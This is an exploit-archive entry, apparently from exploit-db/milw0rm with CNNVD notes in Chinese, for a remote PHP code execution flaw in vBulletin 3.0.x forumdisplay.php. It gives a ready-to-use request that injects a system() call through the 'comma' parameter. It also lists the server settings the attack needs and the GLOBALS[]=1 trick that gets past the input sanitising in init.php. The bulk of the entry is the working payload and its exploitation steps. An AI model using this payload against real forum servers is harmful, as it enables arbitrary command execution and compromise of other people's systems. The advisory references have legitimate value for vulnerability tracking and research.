https://www.exploit-db.com/exploits/818
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-246

vBulletinforumdisplay.php脚本存在安全问题，远程攻击者可以利用这个漏洞以进程权限执行任意命令。

Exploit:
----------------
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

Conditions:
----------------
1st condition     : $vboptions['showforumusers'] == True , the admin must set
		    showforumusers ON in vbulletin options.

2nd condition     : $bbuserinfo['userid'] == 0 , you must be an visitor/guest.

3rd condition     : $DB_site->fetch_array($forumusers) == True , when you
		    visit the forums, it  must has at least one user show the forum.

4th condition     : magic_quotes_gpc must be OFF

SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
		    init.php by secret array GLOBALS[]=1 ;)))

# milw0rm.com [2005-02-14]

来源:BUGTRAQ
名称:20050213vbulletin3.0.xPHPcodeexecution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110840807415315&w;=2
来源:BID
名称:12542
链接:http://www.securityfocus.com/bid/12542